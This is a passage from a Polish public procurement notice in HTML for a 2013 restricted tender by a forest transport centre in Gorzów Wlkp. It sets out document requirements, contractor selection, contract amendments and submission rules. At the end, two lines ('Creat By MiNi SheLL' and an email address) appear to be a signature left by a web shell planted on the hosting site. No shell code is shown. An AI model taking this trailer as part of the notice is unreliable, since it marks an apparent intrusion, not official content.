4)Wykaz wykonanych usług, stanowiący załącznik nr 4 do ogłoszenia, 
5)Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, stanowiący załącznik nr 5 do ogłoszenia, 
6)Oświadczenie że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, stanowiące załącznik nr 6 do ogłoszenia.
7)Oświadczenie o przynależności lub braku przynależności do grupy kapitałowej stanowiące załącznik nr 7 do ogłoszenia.
4.Ponadto, zgodnie z art. 23 ustawy Prawo Zamówień publicznych, Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia powinno zostać dołączone do wniosku o dopuszczenie do udziału w postępowaniu. Pełnomocnictwo powinno zostać przedłożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)dokumenty wymienione w pkt. III. 4.2. lub odpowiednio w pkt III.4.3. niniejszego ogłoszenia składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia bądź należycie umocowany pełnomocnik wykonawców wspólnie ubiegających się  o udzielenie zamówienia;
2)dokumenty składane w celu potwierdzenia spełnienia warunków udziału w postępowaniu określonych w pkt. III.4.1. niniejszego ogłoszenia winien przedłożyć w imieniu wszystkich ten, lub ci spośród Wykonawców, którzy łącznie wykazują spełnienie warunku.
4.Ponadto, zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wzory załączników nr 1, 2, 3, 4, 5, 6,7 znajdują się na stronie internetowej Zamawiającego: http://www.szczecin.lasy.gov.pl/web/otl_gorzow</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 10.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1)Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu wg formuły :spełnia - nie spełnia. Ocena spełnienia warunków udziału w postępowaniu  dokonywana będzie wyłącznie na podstawie dokumentów wymaganych w pkt III.4) niniejszego ogłoszenia. Niespełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania. 
2)Zamawiający zaprosi do składania ofert Wykonawców, którzy spełniają warunki udziału w postępowaniu, jednak w liczbie nie większej niż 10. 
3)Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, jest większa niż określona w ogłoszeniu, zamawiający zaprasza do składania ofert wykonawców wyłonionych w sposób obiektywny i niedyskryminacyjny. Ocena poziomu spełniania warunków opisanych w pkt III.3.2) ogłoszenia będzie elementem oceny wniosku, służącej do wyboru grupy 10 wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu. Za każdą wykonaną usługę, o której mowa w pkt. III.3.2) ogłoszenia Zamawiający przyzna jeden pkt. W przypadku uzyskania przez wykonawców równej ilości punktów przyznanych za wykonane projekty, o których mowa w pkt. III.3.2) ogłoszenia o miejscu w punktacji decydować będzie suma powierzchni użytkowych punktowanych obiektów (im większa suma powierzchni użytkowych projektowanych budynków, tym wyższe miejsce). 
4)Jeżeli liczba Wykonawców spełniających warunki udziału w postępowaniu będzie mniejsza niż przewidziana maksymalna liczba tj. 10, Zamawiający zaprosi do składania ofert wszystkich Wykonawców, którzy będą spełniać te warunki.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania Umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż Umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu Umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia zmian stanu prawnego, a w szczególności zmiany stawek podatku VAT, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy. 
Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany redakcyjne weryfikujące dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający przekaże Specyfikację Istotnych Warunków Zamówienia Wykonawcom, którzy zostaną zaproszeni do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2013 godzina 10:00, miejsce: Sekretariat Ośrodka Transportu Leśnego, ul. Szpitalna 2, 66-400 Gorzów Wlkp..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)Wykonawca składa tylko jeden wniosek o dopuszczenie do udziału w postępowaniu. 
2)Do wniosku o dopuszczenie do udziału w postępowaniu należy dołączyć wszystkie wymagane dokumenty wskazane w treści niniejszego ogłoszenia o zamówieniu. Wniosek oraz pozostałe dokumenty, dla których Zamawiający określił wzory w formie załączników, winny być złożone przez Wykonawcę na tych załącznikach. Wykonawca może sporządzić własny dokument, ale pod warunkiem, że umieści w nim wszystkie informacje ściśle wg wzoru Zamawiającego.
3)Wniosek oraz wszystkie wymagane przez Zamawiającego w niniejszym ogłoszeniu dokumenty powinny być podpisane przez Wykonawcę zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze. Jeżeli osoba/osoby podpisująca wniosek o dopuszczenie do udziału w postępowaniu działa na podstawie pełnomocnictwa, to pełnomocnictwo to powinno w swej treści wskazywać uprawnienie do podpisania wniosku o dopuszczenie do udziału w postępowaniu. Pełnomocnictwo to musi zostać dołączone do wniosku o dopuszczenie do udziału w postępowaniu w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza. 
4)Wniosek o dopuszczenie do udziału w postępowaniu musi być sporządzony w języku polskim. Każdy dokument dołączony do wniosku o dopuszczenie do udziału w postępowaniu, sporządzony w innym języku niż język polski, winien być złożony wraz z tłumaczeniem na język polski. W razie wątpliwości uznaje się, iż wersja polskojęzyczna jest wersją wiążącą.
5)Dokumenty mogą być przedstawione w formie oryginałów albo kopii poświadczonych za zgodność z oryginałem przez osobę(by) reprezentującą(ce) Wykonawcę. Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem).
6)Wniosek o dopuszczenie do udziału w postępowaniu musi być sporządzony z zachowaniem formy pisemnej pod rygorem nieważności (ręcznie, na maszynie do pisania lub w postaci wydruku).
7)Strony wniosku o dopuszczenie do udziału w postępowaniu powinny być ponumerowane i zabezpieczone przed zdekompletowaniem (np. zszycie, zbindowanie).
8)Wszelkie poprawki w treści wniosku o dopuszczenie do udziału w postępowaniu muszą być parafowane przez osobę podpisującą wniosek.
9)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów winny być poświadczone za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 
10)Informacje stanowiące tajemnicę przedsiębiorstwa na podstawie ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (tekst jedn. Dz. U. z 2003r. Nr 153 poz. 1503 ze zm.), Wykonawca winien zastrzec, że nie mogą być one udostępnione innym uczestnikom postępowania. W tym przypadku winien je umieścić w osobnej kopercie i oznaczyć w sposób nie budzący wątpliwości, iż stanowi ona tajemnicę przedsiębiorstwa np.: TAJEMNICA PRZEDSIĘBIORSTWA. NIE UDOSTĘPNIAĆ INNYM UCZESTNIKOM POSTĘPOWANIA.
11)Wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia należy umieścić w kopercie, która będzie posiadać oznaczenie: 
Nr sprawy:2711/1/2013 oraz będzie opatrzona pieczęcią Wykonawcy lub słownie nazwą firmy i adresem nadawcy (wraz z numerem telefonu).
12)Termin wykonania zamówienia: 210 dni oznacza dni robocze od dnia podpisania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com